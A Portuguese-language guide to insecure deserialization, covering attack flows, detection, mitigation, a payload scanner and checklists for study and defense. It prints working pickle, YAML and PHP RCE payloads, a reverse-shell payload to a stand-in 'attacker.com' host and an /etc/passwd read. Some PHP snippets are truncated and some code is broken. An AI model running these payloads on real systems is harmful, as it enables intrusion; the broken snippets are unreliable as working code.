# Insecure Deserialization ## šŸ“‹ **ƍndice** 1. [Conceitos Fundamentais](#-conceitos-fundamentais) 2. [Mecanismos de Ataque](#-mecanismos-de-ataque) 3. [IdentificaĆ§Ć£o e DetecĆ§Ć£o](#-identificaĆ§Ć£o-e-detecĆ§Ć£o) 4. [ExploraĆ§Ć£o e Impacto](#-exploraĆ§Ć£o-e-impacto) 5. [MitigaĆ§Ć£o e CorreĆ§Ć£o](#-mitigaĆ§Ć£o-e-correĆ§Ć£o) 6. [Ferramentas e Testes](#-ferramentas-e-testes) 7. [Checklists de SeguranƧa](#-checklists-de-seguranƧa) *** ## šŸ” **Conceitos Fundamentais** ### **O que Ć© Insecure Deserialization** Insecure Deserialization Ć© uma vulnerabilidade que ocorre quando dados nĆ£o confiĆ”veis sĆ£o desserializados sem validaĆ§Ć£o adequada, permitindo que atacantes execute cĆ³digo arbitrĆ”rio, escale privilĆ©gios ou realize outros ataques. ### **PrincĆ­pio de Funcionamento** ``` Dados Maliciosos ā†’ DesserializaĆ§Ć£o Insegura ā†’ ExecuĆ§Ć£o de CĆ³digo ā†“ ā†“ ā†“ Objeto serializado Processo sem validaĆ§Ć£o Comprometimento com payload aceita dados nĆ£o do sistema confiĆ”veis ``` ### **CaracterĆ­sticas da Vulnerabilidade** * **Explora a confianƧa** no processo de desserializaĆ§Ć£o * **Pode levar a RCE** (Remote Code Execution) * **Afeta mĆŗltiplas linguagens** e formatos * **Frequentemente de alta severidade** * **Complexa de detectar** em testes automatizados ### **Conceitos TĆ©cnicos** #### **SerializaĆ§Ć£o** ```python # Exemplo de serializaĆ§Ć£o em Python import pickle class User: def __init__(self, username, role): self.username = username self.role = role user = User("admin", "administrator") serialized_data = pickle.dumps(user) # b'\x80\x04\x95.\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04User\x94\x93\x94)\x81\x94}\x94(\x8c\x08username\x94\x8c\x05admin\x94\x8c\x04role\x94\x8c\radministrator\x94ub.' ``` #### **DesserializaĆ§Ć£o** ```python # Processo de desserializaĆ§Ć£o deserialized_user = pickle.loads(serialized_data) print(deserialized_user.username) # "admin" print(deserialized_user.role) # "administrator" ``` ### **Formatos de SerializaĆ§Ć£o Comuns** ```json { "linguagens": { "Java": ["Java Serialization", "XML", "JSON", "YAML"], "Python": ["pickle", "marshal", "JSON", "YAML"], "PHP": ["serialize()", "JSON", "XML"], "Ruby": ["Marshal", "YAML", "JSON"], ".NET": ["BinaryFormatter", "XML", "JSON"] }, "formatos": { "binario": ["pickle", "Java Serialization", "BinaryFormatter"], "texto": ["JSON", "XML", "YAML"], "propriedades": ["ini", "properties"] } } ``` *** ## āš”ļø **Mecanismos de Ataque** ### **Fluxo de Ataque Completo** ```mermaid sequenceDiagram participant A as Atacante participant V as AplicaĆ§Ć£o VulnerĆ”vel participant S as Sistema Alvo Note over A,V: FASE 1: Reconhecimento A->>V: Identifica pontos de desserializaĆ§Ć£o A->>V: Analisa formato e linguagem V->>A: Retorna informaƧƵes (erros, headers) Note over A,V: FASE 2: Desenvolvimento do Payload A->>A: Cria payload malicioso serializado A->>A: Explora gadgets chains disponĆ­veis A->>A: Codifica payload para formato alvo Note over A,V: FASE 3: InjeĆ§Ć£o do Payload A->>V: Envia dados serializados maliciosos V->>V: Processa desserializaĆ§Ć£o sem validaĆ§Ć£o V->>S: Executa cĆ³digo/commands do payload Note over A,S: FASE 4: ExploraĆ§Ć£o S->>S: Executa aƧƵes maliciosas S-->>A: Retorna resultados/acesso ``` ### **CenĆ”rio 1: Python pickle RCE** ```python import pickle import os import base64 # Payload malicioso para RCE class RCEPayload: def __reduce__(self): # Comando a ser executado na desserializaĆ§Ć£o return (os.system, ('id > /tmp/pwned.txt',)) # Gerar payload serializado malicious_pickle = pickle.dumps(RCEPayload()) # Codificar para transporte encoded_payload = base64.b64encode(malicious_pickle).decode() print(f"Payload malicioso: {encoded_payload}") # SimulaĆ§Ć£o de desserializaĆ§Ć£o vulnerĆ”vel try: decoded_payload = base64.b64decode(encoded_payload) pickle.loads(decoded_payload) # RCE ocorre aqui! print("Payload executado com sucesso!") except Exception as e: print(f"Erro: {e}") ``` ### **CenĆ”rio 2: Java Deserialization** ```java // Exemplo de payload Java usando CommonsCollections import java.lang.reflect.InvocationHandler; import java.util.Map; import java.util.HashMap; // Gadget chain para RCE public class JavaDeserializationPayload { public static void main(String[] args) throws Exception { // Usando Ysoserial para gerar payload // java -jar ysoserial.jar CommonsCollections5 'id > /tmp/pwned' > payload.ser } } // CĆ³digo vulnerĆ”vel try { FileInputStream fileIn = new FileInputStream("payload.ser"); ObjectInputStream in = new ObjectInputStream(fileIn); Object obj = in.readObject(); // DesserializaĆ§Ć£o perigosa in.close(); fileIn.close(); } catch (Exception e) { e.printStackTrace(); } ``` ### **CenĆ”rio 3: PHP Object Injection** ```php data['cmd'])) { system($this->data['cmd']); } } } // Payload serializado $serialized_payload = 'O:15:"VulnerableClass":1:{s:4:"data";a:1:{s:3:"cmd";s:10:"id;whoami";}}'; // DesserializaĆ§Ć£o insegura $obj = unserialize($serialized_payload); // RCE ocorre aqui! // Ou atravĆ©s de entrada de usuĆ”rio if (isset($_COOKIE['user_data'])) { $user_data = unserialize($_COOKIE['user_data']); // VulnerĆ”vel! } ?> ``` ### **CenĆ”rio 4: JSON Deserialization Attacks** ```javascript // Node.js - desserializaĆ§Ć£o insegura com JSON.parse + prototype pollution const maliciousJSON = `{ "__proto__": { "isAdmin": true }, "username": "attacker" }`; // DesserializaĆ§Ć£o "segura" mas ainda vulnerĆ”vel const user = JSON.parse(maliciousJSON); // Prototype pollution ocorre console.log({}.isAdmin); // true - pollution bem-sucedido // Exemplo com construtor manipulation const payload = `{ "constructor": { "prototype": { "isAdmin": true } } }`; ``` ### **CenĆ”rio 5: YAML Deserialization** ```python import yaml import os # Payload YAML malicioso para PyYAML malicious_yaml = """ !!python/object/apply:os.system args: ['id > /tmp/yaml_pwned.txt'] """ # DesserializaĆ§Ć£o insegura yaml.load(malicious_yaml) # RCE ocorre aqui! # VersĆ£o segura (mas ainda cuidadosa) yaml.safe_load(malicious_yaml) # LanƧaria exceĆ§Ć£o ``` *** ## šŸ”Ž **IdentificaĆ§Ć£o e DetecĆ§Ć£o** ### **Indicadores de Vulnerabilidade** ```bash # Pontos crĆ­ticos para teste - DesserializaĆ§Ć£o de dados de entrada do usuĆ”rio - Uso de formatos binĆ”rios de serializaĆ§Ć£o - AusĆŖncia de validaĆ§Ć£o de integridade - ConfiguraƧƵes permissivas de desserializaĆ§Ć£o - Uso de bibliotecas conhecidamente vulnerĆ”veis ``` ### **Locais Comuns de DesserializaĆ§Ć£o** ``` Cookies: session=base64_encoded_serialized_object user_prefs=serialized_data APIs: POST /api/data { "serialized": "base64_data" } GET /export?data=serialized_object Storage: LocalStorage/sessionStorage com objetos serializados Bancos de dados com campos BLOB serializados ParĆ¢metros: ?data=rO0ABXQAA... (base64 encoded serialized) ?config=serialized_config_object ``` ### **Metodologia de Teste Manual** #### **1. IdentificaĆ§Ć£o de Pontos de Entrada** ```javascript // Ferramentas do navegador - inspecionar dados // Cookies document.cookie // LocalStorage Object.keys(localStorage).forEach(key => { console.log(key, localStorage.getItem(key)); }); // Requests de rede // Verificar por dados base64 ou estrutura serializada ``` #### **2. AnĆ”lise de Assinaturas de Formatos** ```python # Identificar formatos de serializaĆ§Ć£o def identify_serialization_format(data): signatures = { 'java_serialized': b'\xac\xed\x00\x05', # Magic number Java 'python_pickle': b'\x80', # Protocol version pickle 'php_serialized': b'O:', # Object serialized 'net_binary': b'\x00\x01\x00\x00\x00', # .NET BinaryFormatter } for format_name, signature in signatures.items(): if data.startswith(signature): return format_name return 'unknown' # Testar com dados de exemplo test_data = b'\xac\xed\x00\x05test' print(identify_serialization_format(test_data)) # 'java_serialized' ``` #### **3. Teste com Payloads Simples** ```python import base64 import requests def test_deserialization(target_url, cookie_name): """Testar vulnerabilidade de desserializaĆ§Ć£o""" # Payloads de teste para diferentes linguagens test_payloads = { 'java': r'\xac\xed\x00\x05test', 'python_pickle': base64.b64encode(b'\x80\x04test').decode(), 'php': 'O:8:"stdClass":0:{}' } for lang, payload in test_payloads.items(): cookies = {cookie_name: payload} try: response = requests.get(target_url, cookies=cookies) # Analisar resposta por indicadores if any(indicator in response.text for indicator in ['error', 'exception', 'stack trace']): print(f"PossĆ­vel vulnerabilidade {lang} detectada") print(f"Resposta: {response.text[:500]}") except Exception as e: print(f"Erro no teste {lang}: {e}") ``` ### **TĆ©cnicas de Fingerprinting** #### **1. DetecĆ§Ć£o de Linguagem via Erros** ```http POST /api/user HTTP/1.1 Content-Type: application/json {"data": "rO0ABXQAA"} # Java serialized magic bytes # Respostas tĆ­picas: # Java: java.io.IOException, InvalidClassException # Python: pickle.UnpicklingError, _pickle.UnpicklingError # PHP: unserialize(): Error at offset # .NET: System.Runtime.Serialization.SerializationException ``` #### **2. Payloads de Reconhecimento** ```python # Payload para detectar ambiente class ReconPayload: def __reduce__(self): return (eval, ('__import__("sys").version',)) recon_pickle = pickle.dumps(ReconPayload()) ``` *** ## šŸ’„ **ExploraĆ§Ć£o e Impacto** ### **TĆ©cnicas de ExploraĆ§Ć£o AvanƧadas** #### **1. Gadget Chains em Java** ```java // Exemplo de gadget chain usando CommonsCollections // Comando: java -jar ysoserial.jar CommonsCollections5 'command' > payload.ser // Chains populares: // - CommonsCollections1-7 // - Groovy1 // - Spring1-2 // - Jdk7u21 // - Jdk8u20 ``` #### **2. Python Pickle Gadgets** ```python import pickle import subprocess class ComplexRCE: def __reduce__(self): # Executar comando e capturar output return ( subprocess.Popen, (['/bin/sh', '-c', 'id; ls -la; cat /etc/passwd'],), {'stdout': -1, 'stderr': -1} ) # Gerar payload payload = pickle.dumps(ComplexRCE()) # Para exploraĆ§Ć£o remota class ReverseShell: def __reduce__(self): return ( os.system, ('bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"',) ) ``` #### **3. PHP Object Injection Chains** ```php filename, $this->data); } } class SystemCommand { private $command; public function __wakeup() { system($this->command); } } // Payload para escrever webshell $payload = serialize(new FileWriter()); $payload = 'O:10:"FileWriter":2:{s:17:"'."\0".'FileWriter'."\0".'filename";s:10:"shell.php";s:14:"'."\0".'FileWriter'."\0".'data";s:31:"";}'; // Ou para execuĆ§Ć£o direta $payload = 'O:13:"SystemCommand":1:{s:20:"'."\0".'SystemCommand'."\0".'command";s:10:"id; whoami";}'; ?> ``` #### **4. .NET BinaryFormatter Exploitation** ```csharp // Gerar payload com ysoserial.net // ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "command" // Exemplo de cĆ³digo vulnerĆ”vel IFormatter formatter = new BinaryFormatter(); Stream stream = new FileStream("data.bin", FileMode.Open, FileAccess.Read); object obj = formatter.Deserialize(stream); // DesserializaĆ§Ć£o perigosa ``` ### **Bypass de ProteƧƵes** #### **1. Bypass de Assinatura Digital** ```python # Se a aplicaĆ§Ć£o verifica assinatura antes de desserializar import hmac import hashlib def sign_data(data, secret): return hmac.new(secret, data, hashlib.sha256).digest() # Bypass: injetar payload vĆ”lido e modificar apĆ³s assinatura original_data = b'safe_data' signature = sign_data(original_data, b'secret') # Ataque: manter assinatura vĆ”lida mas modificar dados malicious_data = b'malicious_payload' # Explorar vulnerabilidade no processo de verificaĆ§Ć£o ``` #### **2. Bypass de ValidaĆ§Ć£o de Classe** ```java // Se a aplicaĆ§Ć£o usa whitelist de classes public class SafeObjectInputStream extends ObjectInputStream { private static final Set ALLOWED_CLASSES = Set.of("com.app.SafeClass1", "com.app.SafeClass2"); @Override protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { if (!ALLOWED_CLASSES.contains(desc.getName())) { throw new InvalidClassException("Classe nĆ£o permitida: ", desc.getName()); } return super.resolveClass(desc); } } // Bypass: usar classes na whitelist que possam ser exploradas // ou explorar desserializaĆ§Ć£o nativa que ignora validaƧƵes ``` ### **Impacto das Vulnerabilidades** #### **ClassificaĆ§Ć£o de Impacto** ```json { "impacto_critico": { "rce": [ "ExecuĆ§Ć£o remota de cĆ³digo", "Comprometimento completo do servidor", "Acesso a nĆ­vel de sistema operacional" ], "privilege_escalation": [ "EscalaĆ§Ć£o de privilĆ©gios", "Acesso a dados sensĆ­veis", "Controle administrativo" ] }, "impacto_alto": { "data_manipulation": [ "ModificaĆ§Ć£o de dados", "InjeĆ§Ć£o de dados maliciosos", "CorrupĆ§Ć£o de base de dados" ], "authentication_bypass": [ "Bypass de autenticaĆ§Ć£o", "Acesso nĆ£o autorizado", "Impersonation de usuĆ”rios" ] }, "impacto_medio": { "dos": [ "NegaĆ§Ć£o de serviƧo", "Consumo excessivo de recursos", "Crash da aplicaĆ§Ć£o" ], "information_disclosure": [ "Vazamento de informaƧƵes", "ExposiĆ§Ć£o de dados internos", "RevelaĆ§Ć£o de estrutura da aplicaĆ§Ć£o" ] } } ``` #### **Cadeia de Ataque Completa** ``` Reconhecimento ā†’ Desenvolvimento Payload ā†’ InjeĆ§Ć£o ā†’ DesserializaĆ§Ć£o ā†’ ExecuĆ§Ć£o ``` *** ## šŸ›”ļø **MitigaĆ§Ć£o e CorreĆ§Ć£o** ### **EstratĆ©gias de Defesa em Camadas** #### **1. NĆ£o Desserializar Dados NĆ£o ConfiĆ”veis** ```python # ABORDAGEM PREFERIDA: Evitar desserializaĆ§Ć£o completamente # Usar formatos seguros como JSON com validaĆ§Ć£o de esquema import json import jsonschema def safe_data_processing(json_data): schema = { "type": "object", "properties": { "username": {"type": "string"}, "role": {"type": "string", "enum": ["user", "admin"]} }, "required": ["username", "role"] } try: # Validar esquema antes de processar jsonschema.validate(instance=json_data, schema=schema) # Processar dados validados user = User(username=json_data['username'], role=json_data['role']) return user except jsonschema.ValidationError as e: raise ValueError(f"Dados invĆ”lidos: {e}") ``` #### **2. ImplementaĆ§Ć£o de Whitelist Rigorosa** ```java public class SecureObjectInputStream extends ObjectInputStream { private final Set allowedClasses; public SecureObjectInputStream(InputStream input, Set allowedClasses) throws IOException { super(input); this.allowedClasses = allowedClasses; } @Override protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { String className = desc.getName(); if (!allowedClasses.contains(className)) { throw new SecurityException("DesserializaĆ§Ć£o de classe nĆ£o permitida: " + className); } return super.resolveClass(desc); } } // Uso seguro Set allowedClasses = Set.of( "com.company.SafeDataObject", "com.company.UserPreferences" ); try (SecureObjectInputStream sois = new SecureObjectInputStream(inputStream, allowedClasses)) { Object obj = sois.readObject(); // Processar objeto seguro } ``` #### **3. ValidaĆ§Ć£o de Integridade e Assinatura** ```python import hmac import hashlib import pickle class SecureDeserializer: def __init__(self, secret_key): self.secret_key = secret_key def serialize(self, obj): """Serializar com assinatura""" data = pickle.dumps(obj) signature = hmac.new(self.secret_key, data, hashlib.sha256).digest() return signature + data def deserialize(self, signed_data): """Desserializar com verificaĆ§Ć£o de assinatura""" if len(signed_data) < 32: raise ValueError("Dados assinados muito curtos") signature = signed_data[:32] data = signed_data[32:] # Verificar assinatura expected_signature = hmac.new(self.secret_key, data, hashlib.sha256).digest() if not hmac.compare_digest(signature, expected_signature): raise SecurityError("Assinatura invĆ”lida") # Whitelist de classes permitidas allowed_classes = {'SafeClass', 'UserData'} # Criar unpickler seguro class RestrictedUnpickler(pickle.Unpickler): def find_class(self, module, name): full_name = f"{module}.{name}" if full_name not in allowed_classes: raise SecurityError(f"Classe nĆ£o permitida: {full_name}") return super().find_class(module, name) return RestrictedUnpickler(io.BytesIO(data)).load() ``` ### **PadrƵes de CodificaĆ§Ć£o Seguros** #### **1. Python - Alternativas Seguras** ```python import json import ast import pickle # OPƇƃO 1: JSON para dados simples def safe_json_deserialize(json_data): try: data = json.loads(json_data) # ValidaĆ§Ć£o adicional do schema if not isinstance(data, dict): raise ValueError("Dados devem ser um objeto") return data except json.JSONDecodeError as e: raise ValueError(f"JSON invĆ”lido: {e}") # OPƇƃO 2: ast.literal_eval para estruturas Python (limitado) def safe_literal_eval(data): try: return ast.literal_eval(data) except (ValueError, SyntaxError) as e: raise ValueError(f"Dados invĆ”lidos: {e}") # OPƇƃO 3: Pickle com restriƧƵes def safe_pickle_loads(data, allowed_classes=None): if allowed_classes is None: allowed_classes = {'__main__.SafeClass'} class RestrictedUnpickler(pickle.Unpickler): def find_class(self, module, name): full_name = f"{module}.{name}" if full_name not in allowed_classes: raise pickle.UnpicklingError(f"Classe {full_name} nĆ£o permitida") return super().find_class(module, name) return RestrictedUnpickler(io.BytesIO(data)).load() ``` #### **2. Java - ConfiguraƧƵes Seguras** ```java // ConfiguraĆ§Ć£o JVM para prevenir desserializaĆ§Ć£o maliciosa // Adicionar Ć s opƧƵes da JVM: // -Djava.io.serialization.filter=serialization-filter.properties // ConteĆŗdo do arquivo serialization-filter.properties: // java.io.Serializable=maxdepth=5;maxarray=1000;maxrefs=1000 // Ou programaticamente: public class GlobalSerializationFilter { static { ObjectInputFilter.Config.setSerialFilter( ObjectInputFilter.merge( ObjectInputFilter.Config.getSerialFilter(), ObjectInputFilter.rejectFilter( cl -> cl.getName().startsWith("org.apache.commons.collections"), ObjectInputFilter.Status.UNDECIDED ) ) ); } } ``` #### **3. PHP - ValidaĆ§Ć£o Rigorosa** ```php $this->allowed_classes]); if ($result === false && $data !== 'b:0;') { throw new InvalidArgumentException("Dados serializados invĆ”lidos"); } return $result; } // Alternativa: usar JSON public function safe_json_decode($json_data) { $data = json_decode($json_data, true); if (json_last_error() !== JSON_ERROR_NONE) { throw new InvalidArgumentException("JSON invĆ”lido: " . json_last_error_msg()); } return $data; } } // Uso seguro $secure_deserializer = new SecureDeserialization(); try { $data = $secure_deserializer->safe_json_decode($_POST['data']); // Processar dados validados } catch (Exception $e) { error_log("Tentativa de desserializaĆ§Ć£o insegura: " . $e->getMessage()); http_response_code(400); } ?> ``` ### **ConfiguraƧƵes de Ambiente Seguras** #### **1. ConfiguraĆ§Ć£o YAML Segura** ```python import yaml # CONFIGURAƇƃO PERIGOSA (padrĆ£o) # data = yaml.load(yaml_data) # EVITAR! # CONFIGURAƇƃO SEGURA def safe_yaml_load(yaml_data): # Usar SafeLoader try: data = yaml.safe_load(yaml_data) return data except yaml.YAMLError as e: raise ValueError(f"YAML invĆ”lido: {e}") # Para carregamento mais restritivo class RestrictedLoader(yaml.SafeLoader): def __init__(self, stream): super().__init__(stream) # Desabilitar construtores perigosos self.yaml_constructors = { key: value for key, value in self.yaml_constructors.items() if not key.startswith('!!python/') } def restricted_yaml_load(yaml_data): return yaml.load(yaml_data, Loader=RestrictedLoader) ``` #### **2. Headers de SeguranƧa HTTP** ```nginx # Adicionar headers para prevenir certos ataques add_header X-Content-Type-Options "nosniff"; add_header X-Frame-Options "DENY"; add_header Content-Security-Policy "default-src 'self'"; # Limitar tamanho de requests para prevenir DoS client_max_body_size 1M; ``` *** ## šŸ”§ **Ferramentas e Testes** ### **Ferramentas de AnĆ”lise Automatizada** #### **1. Scanner de DesserializaĆ§Ć£o Personalizado** ```python #!/usr/bin/env python3 # deserialization_scanner.py import requests import base64 import pickle import os from urllib.parse import urljoin class DeserializationScanner: def __init__(self, target_url): self.target = target_url self.session = requests.Session() self.vulnerabilities = [] def generate_payloads(self): """Gerar payloads para diferentes linguagens""" payloads = {} # Python pickle payload class PickleRCE: def __reduce__(self): return (os.system, ('echo "PICKLE_RCE_SUCCESS"',)) payloads['python_pickle'] = { 'data': base64.b64encode(pickle.dumps(PickleRCE())).decode(), 'indicator': 'PICKLE_RCE_SUCCESS' } # PHP serialized payload payloads['php_serialized'] = { 'data': 'O:8:"stdClass":1:{s:3:"cmd";s:22:"echo "PHP_RCE_SUCCESS"";}', 'indicator': 'PHP_RCE_SUCCESS' } # Java serialized magic bytes (detection only) payloads['java_magic'] = { 'data': base64.b64encode(b'\xac\xed\x00\x05').decode(), 'indicator': 'java.io' } return payloads def test_cookie_injection(self, cookie_name): """Testar injeĆ§Ć£o via cookies""" payloads = self.generate_payloads() for payload_name, payload_data in payloads.items(): cookies = {cookie_name: payload_data['data']} try: response = self.session.get(self.target, cookies=cookies, timeout=10) if payload_data['indicator'] in response.text: print(f"āœ… Vulnerabilidade detectada: {payload_name}") self.vulnerabilities.append({ 'type': 'cookie_injection', 'payload': payload_name, 'location': 'cookie', 'confidence': 'high' }) except requests.RequestException as e: print(f"āŒ Erro no teste {payload_name}: {e}") def test_post_parameters(self, endpoint, parameter_name): """Testar injeĆ§Ć£o via parĆ¢metros POST""" payloads = self.generate_payloads() for payload_name, payload_data in payloads.items(): data = {parameter_name: payload_data['data']} try: response = self.session.post( urljoin(self.target, endpoint), data=data, timeout=10 ) if payload_data['indicator'] in response.text: print(f"āœ… Vulnerabilidade detectada: {payload_name} em {endpoint}") self.vulnerabilities.append({ 'type': 'post_parameter', 'payload': payload_name, 'endpoint': endpoint, 'parameter': parameter_name, 'confidence': 'high' }) except requests.RequestException as e: print(f"āŒ Erro no teste {payload_name}: {e}") def generate_report(self): """Gerar relatĆ³rio de vulnerabilidades""" return { 'target': self.target, 'vulnerabilities_found': len(self.vulnerabilities), 'details': self.vulnerabilities, 'recommendations': [ "Implementar whitelist de classes para desserializaĆ§Ć£o", "Usar formatos seguros como JSON com validaĆ§Ć£o de schema", "Assinar e verificar integridade dos dados serializados", "Atualizar bibliotecas de serializaĆ§Ć£o para versƵes seguras" ] } # Uso do scanner if __name__ == "__main__": scanner = DeserializationScanner('https://alvo.com') # Testar cookies comuns common_cookies = ['session', 'user_data', 'preferences', 'data'] for cookie in common_cookies: scanner.test_cookie_injection(cookie) # Testar endpoints comuns endpoints = [ ('/api/data', 'data'), ('/api/user', 'user_data'), ('/import', 'import_data') ] for endpoint, param in endpoints: scanner.test_post_parameters(endpoint, param) report = scanner.generate_report() print("\n" + "="*50) print("RELATƓRIO DE VULNERABILIDADES") print("="*50) print(f"Alvo: {report['target']}") print(f"Vulnerabilidades encontradas: {report['vulnerabilities_found']}") for vuln in report['details']: print(f"- {vuln['type']}: {vuln.get('payload', 'N/A')}") ``` #### **2. Ferramentas Especializadas** ```bash # Java Deserialization Scanners java -jar ysoserial.jar # Gerar payloads java -jar marshalsec.jar # Servidor LDAP para gadgets # Python python -c "import pickle, os; print(pickle.dumps(os.system('id')))" # Gerar payload # Ferramentas de anĆ”lise estĆ”tica # - Semgrep para padrƵes de desserializaĆ§Ć£o insegura # - CodeQL queries para desserializaĆ§Ć£o # - Checkmarx, Fortify # Burp Suite Extensions # - Java Deserialization Scanner # - PHP Object Injection Check # - .NET Serialization Scanner ``` ### **Testes Manuais com Ferramentas de Desenvolvimento** #### **1. AnĆ”lise de Requests/Responses** ```javascript // Interceptar e modificar requests no navegador // No console do desenvolvedor: // Monitorar todos os requests const originalFetch = window.fetch; window.fetch = function(...args) { console.log('Fetch:', args); return originalFetch.apply(this, args); }; // Verificar cookies serializados document.cookie.split(';').forEach(cookie => { const [name, value] = cookie.split('='); if (value && value.length > 100) { // PossĆ­vel dado serializado console.log('Cookie grande possivelmente serializado:', name); try { // Tentar detectar formato if (atob(value).includes('java')) { console.log('PossĆ­vel Java serializado:', name); } } catch(e) {} } }); ``` #### **2. Teste de Blind Deserialization** ```python import requests import time def blind_deserialization_test(target_url, parameter_name): """Teste para desserializaĆ§Ć£o blind usando time-based detection""" # Payload que causa delay se executado class TimeBasedPayload: def __reduce__(self): return (time.sleep, (5,)) # 5 segundos de delay malicious_data = pickle.dumps(TimeBasedPayload()) start_time = time.time() try: response = requests.post( target_url, data={parameter_name: base64.b64encode(malicious_data).decode()}, timeout=10 ) except requests.exceptions.Timeout: print("āš ļø PossĆ­vel vulnerabilidade - request timeout") return True elapsed = time.time() - start_time if elapsed > 4.5: # ConsiderĆ”vel delay print(f"āš ļø PossĆ­vel vulnerabilidade - delay de {elapsed:.2f}s") return True return False ``` *** ## šŸ“‹ **Checklists de SeguranƧa** ### **Checklist de PrevenĆ§Ć£o de DesserializaĆ§Ć£o Insegura** * [ ] **Evitar DesserializaĆ§Ć£o de Dados NĆ£o ConfiĆ”veis** * [ ] Usar formatos seguros (JSON, XML) em vez de serializaĆ§Ć£o binĆ”ria * [ ] Validar schema de dados antes do processamento * [ ] Implementar whitelist de classes/estruturas permitidas * [ ] **Implementar Controles de SeguranƧa** * [ ] Assinar e verificar integridade dos dados serializados * [ ] Limitar profundidade e complexidade da desserializaĆ§Ć£o * [ ] Implementar timeout para operaƧƵes de desserializaĆ§Ć£o * [ ] **ConfiguraĆ§Ć£o de Ambiente** * [ ] Usar loaders seguros (YAML SafeLoader, etc.) * [ ] Atualizar bibliotecas de serializaĆ§Ć£o regularmente * [ ] Configurar JVM/ambiente com filtros de serializaĆ§Ć£o * [ ] **Monitoramento e DetecĆ§Ć£o** * [ ] Logar tentativas de desserializaĆ§Ć£o * [ ] Monitorar por padrƵes de desserializaĆ§Ć£o maliciosa * [ ] Implementar WAF rules para detectar payloads conhecidos ### **Checklist de Auditoria** * [ ] **IdentificaĆ§Ć£o de Pontos de DesserializaĆ§Ć£o** * [ ] Buscar por chamadas de desserializaĆ§Ć£o no cĆ³digo * [ ] Verificar cookies, parĆ¢metros e headers * [ ] Analisar APIs e endpoints de importaĆ§Ć£o de dados * [ ] **Teste de ExploraĆ§Ć£o** * [ ] Testar com payloads para diferentes linguagens * [ ] Verificar bypass de whitelists existentes * [ ] Testar desserializaĆ§Ć£o blind com indicadores de tempo * [ ] **AnĆ”lise de DependĆŖncias** * [ ] Verificar versƵes de bibliotecas de serializaĆ§Ć£o * [ ] Identificar gadget chains disponĆ­veis * [ ] Analisar configuraƧƵes de ambiente ### **Checklist de Resposta a Incidentes** * [ ] **DetecĆ§Ć£o** * [ ] Monitorar logs por erros de desserializaĆ§Ć£o * [ ] Alertar para payloads suspeitos * [ ] Detectar comportamentos anormais pĆ³s-desserializaĆ§Ć£o * [ ] **ContenĆ§Ć£o** * [ ] Bloquear IPs maliciosos * [ ] Revogar sessƵes comprometidas * [ ] Isolar sistemas afetados * [ ] **CorreĆ§Ć£o** * [ ] Implementar whitelists rigorosas * [ ] Atualizar bibliotecas vulnerĆ”veis * [ ] Revisar e corrigir cĆ³digo vulnerĆ”vel *** ## šŸ“Š **Exemplos de ImplementaĆ§Ć£o Segura** ### **ConfiguraĆ§Ć£o Completa Python** ```python import pickle import hmac import hashlib import json from typing import Any, Set class SecureSerialization: def __init__(self, secret_key: bytes, allowed_classes: Set[str] = None): self.secret_key = secret_key self.allowed_classes = allowed_classes or {'__main__.SafeData'} def safe_serialize(self, obj: Any) -> str: """SerializaĆ§Ć£o segura com assinatura""" # Preferir JSON para dados simples if self._is_json_serializable(obj): return json.dumps({'type': 'json', 'data': obj}) # Para objetos complexos, usar pickle com assinatura pickled_data = pickle.dumps(obj) signature = hmac.new(self.secret_key, pickled_data, hashlib.sha256).digest() combined = signature + pickled_data return base64.b64encode(combined).decode() def safe_deserialize(self, data: str) -> Any: """DesserializaĆ§Ć£o segura com verificaĆ§Ć£o""" try: decoded = base64.b64decode(data) except Exception: raise SecurityError("Dados codificados invĆ”lidos") if len(decoded) < 32: raise SecurityError("Dados assinados muito curtos") signature = decoded[:32] pickled_data = decoded[32:] # Verificar assinatura expected_signature = hmac.new(self.secret_key, pickled_data, hashlib.sha256).digest() if not hmac.compare_digest(signature, expected_signature): raise SecurityError("Assinatura invĆ”lida") # Unpickler restrito class RestrictedUnpickler(pickle.Unpickler): def find_class(self, module: str, name: str) -> Any: full_name = f"{module}.{name}" if full_name not in self.allowed_classes: raise SecurityError(f"Classe nĆ£o permitida: {full_name}") return super().find_class(module, name) try: return RestrictedUnpickler(io.BytesIO(pickled_data)).load() except pickle.UnpicklingError as e: raise SecurityError(f"Erro na desserializaĆ§Ć£o: {e}") def _is_json_serializable(self, obj: Any) -> bool: """Verificar se objeto Ć© serializĆ”vel em JSON""" try: json.dumps(obj) return True except (TypeError, ValueError): return False # Uso seguro SECRET_KEY = os.urandom(32) serializer = SecureSerialization(SECRET_KEY, {'__main__.User', '__main__.Settings'}) # Serializar user_data = User(name="john", role="user") safe_data = serializer.safe_serialize(user_data) # Desserializar try: restored_user = serializer.safe_deserialize(safe_data) except SecurityError as e: print(f"Tentativa de desserializaĆ§Ć£o insegura: {e}") ``` ### **ConfiguraĆ§Ć£o Java Segura** ```java public class SecureSerializationHelper { private static final Set ALLOWED_CLASSES = Set.of( "com.company.User", "com.company.Settings", "java.util.ArrayList", "java.util.HashMap" ); public static byte[] safeSerialize(Serializable obj) throws IOException { ByteArrayOutputStream baos = new ByteArrayOutputStream(); try (ObjectOutputStream oos = new ObjectOutputStream(baos)) { oos.writeObject(obj); } return baos.toByteArray(); } public static Object safeDeserialize(byte[] data) throws IOException, ClassNotFoundException, SecurityException { ByteArrayInputStream bais = new ByteArrayInputStream(data); try (SecureObjectInputStream sois = new SecureObjectInputStream(bais, ALLOWED_CLASSES)) { return sois.readObject(); } } private static class SecureObjectInputStream extends ObjectInputStream { private final Set allowedClasses; public SecureObjectInputStream(InputStream in, Set allowedClasses) throws IOException { super(in); this.allowedClasses = allowedClasses; } @Override protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException { String className = desc.getName(); // Verificar whitelist if (!allowedClasses.contains(className)) { throw new SecurityException( "Tentativa de desserializaĆ§Ć£o de classe nĆ£o permitida: " + className ); } return super.resolveClass(desc); } } } // Uso seguro try { User user = new User("john", "user"); byte[] serialized = SecureSerializationHelper.safeSerialize(user); // Armazenar/transmitir com seguranƧa... User deserialized = (User) SecureSerializationHelper.safeDeserialize(serialized); } catch (SecurityException e) { logger.warn("Tentativa de desserializaĆ§Ć£o insegura: " + e.getMessage()); } ``` *** ## āš ļø **ConsideraƧƵes Finais** ### 